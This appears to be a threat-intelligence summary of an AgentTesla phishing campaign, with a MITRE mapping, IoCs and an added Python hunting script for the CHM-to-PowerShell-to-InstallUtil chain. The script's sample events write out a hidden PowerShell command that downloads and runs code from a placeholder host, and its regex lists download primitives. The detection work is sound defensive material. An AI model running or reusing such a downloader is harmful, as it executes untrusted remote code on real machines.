AgentTesla is threatening businesses around the world with a new campaign – Avast Threat Labs

A phishing campaign spreading the AgentTesla information stealer targets businesses worldwide with spoofed emails carrying a malicious disk image (.IMG/.ISO) named “Draft Contract”. The disk image holds a CHM file whose obfuscated JavaScript launches a PowerShell downloader; that downloader fetches the final AgentTesla payload, which harvests browser and email client credentials and other system data and exfiltrates them to an attacker-controlled FTP server. #AgentTesla #DraftContract #PowerShell #FTPServer #CHM

Keypoints

  • The campaign uses spoofed emails to deliver a disk image containing a CHM file; obfuscated JavaScript inside the CHM triggers the next stage of the infection.
  • The email subject and the attachment name (“Draft Contract”) are localized to the recipient’s language; the email body is otherwise nearly empty, sometimes containing only the line “Get Outlook for Android.”
  • A PowerShell downloader is launched from the obfuscated script to fetch the final payload.
  • The final payload is AgentTesla spyware capable of stealing passwords, taking screenshots, collecting system information, and downloading more malware.
  • Stolen credentials and victim data are exfiltrated over plain-text FTP to an attacker-controlled server; the attackers download the collected data from that server roughly once an hour.
  • The campaign hit multiple regions in waves (Spain, Portugal, Romania, South America, Germany, Argentina, Switzerland) between August 12 and 23, 2022, with thousands of users protected in each wave.
  • IoCs include SHA256 hashes for the ISO attachment and AgentTesla components, plus several exfiltration and download servers.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The emails are spoofed, and both the subject line and the attachment carry the name “Draft Contract” in the language of the recipient. The body is bare apart from an occasional line reading ‘Get Outlook for Android’.
  • [T1027] Obfuscated Files or Information – The CHM inside the disk image contains obfuscated JavaScript that triggers the download stage.
  • [T1059.001] Command and Scripting Interpreter: PowerShell – The JavaScript launches a PowerShell command that downloads the final payload.
  • [T1036] Masquerading – The final payload is hosted on seemingly legitimate sites under a .jpg filename, so the download looks like a request for an image; the AgentTesla code itself runs injected into InstallUtil.exe, a legitimate .NET Framework utility.
  • [T1041] Exfiltration Over C2 Channel – Credentials stored in browsers and other applications, together with data about the victim’s computer, are sent over plain-text FTP to a server under the attacker’s control.
  • [T1113] Screen Capture – AgentTesla capabilities include taking screenshots.
  • [T1055] Process Injection – AgentTesla does not run as its own visible process; its code is injected into the legitimate InstallUtil.exe executable.
  • [T1082] System Information Discovery – The malware collects basic data about the computer and OS details (user name, computer name, OS, CPU, RAM).
  • [T1105] Ingress Tool Transfer – The PowerShell downloader fetches the final payload from a remote site.
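The technique list above describes a three-step process chain: a CHM opened by the victim (CHM files are handled by the Windows HTML Help executable hh.exe) spawns PowerShell, PowerShell downloads the payload, and the payload is hosted in InstallUtil.exe. The following Python is an added hunting example, not Avast’s code or the campaign’s own tooling. It walks Sysmon-style process-creation records (the field names Image, ParentImage and CommandLine and the pid/ppid pairing are an assumption about the telemetry format) and flags that chain. All event records are constructed sample data; the download URL in them is a placeholder, not one of the campaign’s servers.

```python
"""Hunt for the CHM -> PowerShell -> InstallUtil.exe chain in process telemetry.

Added example; CONSTRUCTED sample events shaped like Sysmon Event ID 1 fields.
The field names and the pid/ppid linkage are an assumption about the log format.
"""
import re

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
HH_EXE = r"C:\Windows\hh.exe"
INSTALLUTIL_EXE = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

# Constructed sample events (not real telemetry). example.invalid is a placeholder.
EVENTS = [
    # Malicious chain: CHM from the mounted disk image opened by hh.exe ...
    {"pid": 4120, "ppid": 3981, "Image": HH_EXE,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" D:\Draft Contract.chm'},
    # ... hh.exe spawns a hidden PowerShell downloader ...
    {"pid": 4204, "ppid": 4120, "Image": PS_EXE, "ParentImage": HH_EXE,
     "CommandLine": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x.jpg')\""},
    # ... and PowerShell starts InstallUtil.exe as the injection host.
    {"pid": 4377, "ppid": 4204, "Image": INSTALLUTIL_EXE, "ParentImage": PS_EXE,
     "CommandLine": INSTALLUTIL_EXE},
    # Benign: a user reads a help file; hh.exe spawns nothing.
    {"pid": 5001, "ppid": 3981, "Image": HH_EXE,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Tools\manual.chm'},
    # Benign: an admin downloads a tool from an interactive cmd.exe.
    {"pid": 5100, "ppid": 5099, "Image": PS_EXE,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -c Invoke-WebRequest https://example.invalid/tool.zip -OutFile t.zip"},
]

# Download primitives commonly seen in PowerShell downloader one-liners.
DOWNLOAD_PATTERN = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest|\biwr\b|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b", re.IGNORECASE)
POWERSHELL_NAMES = {"powershell.exe", "pwsh.exe"}


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_chm_to_powershell(events):
    """PIDs of PowerShell processes spawned by hh.exe with a download primitive on the command line.

    Requiring the hh.exe parent keeps ordinary admin downloads (cmd.exe parent) out of the results.
    """
    return [e["pid"] for e in events
            if image_name(e["Image"]) in POWERSHELL_NAMES
            and image_name(e["ParentImage"]) == "hh.exe"
            and DOWNLOAD_PATTERN.search(e["CommandLine"])]


def find_installutil_from_powershell(events):
    """PIDs of InstallUtil.exe started by PowerShell: the injection host described above."""
    return [e["pid"] for e in events
            if image_name(e["Image"]) == "installutil.exe"
            and image_name(e["ParentImage"]) in POWERSHELL_NAMES]


def reconstruct_chain(events, leaf_pid):
    """Follow ppid links upward from a flagged process and return the image names, root first."""
    by_pid = {e["pid"]: e for e in events}
    chain, pid = [], leaf_pid
    while pid in by_pid:
        chain.append(image_name(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for pid in find_installutil_from_powershell(EVENTS):
        print(f"pid {pid}: {' -> '.join(reconstruct_chain(EVENTS, pid))}")
    for pid in find_chm_to_powershell(EVENTS):
        print(f"pid {pid}: PowerShell downloader launched from a CHM")
```

The two predicates are deliberately narrow (parent must be hh.exe; child must be InstallUtil.exe). Widening them, for instance to any Office or help viewer spawning PowerShell, catches more tradecraft but needs tuning against legitimate admin scripting in the environment.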

Indicators of Compromise

  • [SHA256] Hashes – ISO Attachment: 83fe51953a0fe44389e197244faf90afe8ee80101dc33cb294cf6ef710e5aaba; AgentTesla Downloader Script: 76f707afa3d4b2678aa5af270ea9325de6f8fdc4badf7249418e785438f1b8da; AgentTesla Injector: eb455ffb1595d1a06fc850ebc49b270ae84dd609e7b52144a60bb45cf4c4eb0e
  • [Domain] FTP Exfiltration Server – ftp.akmokykla[.]lt
  • [URL] AgentTesla Download Servers – assltextile[.]com/Su34M.jpg, consult-mob[.]ro/M777.jpg, handcosalon[.]com/Su57.jpg

Read more: https://decoded.avast.io/pavelnovak/agenttesla-is-threatening-businesses-around-the-world-with-a-new-campaign/?utm_source=rss&utm_medium=rss&utm_campaign=agenttesla-is-threatening-business-around-the-world-with-a-new-campaign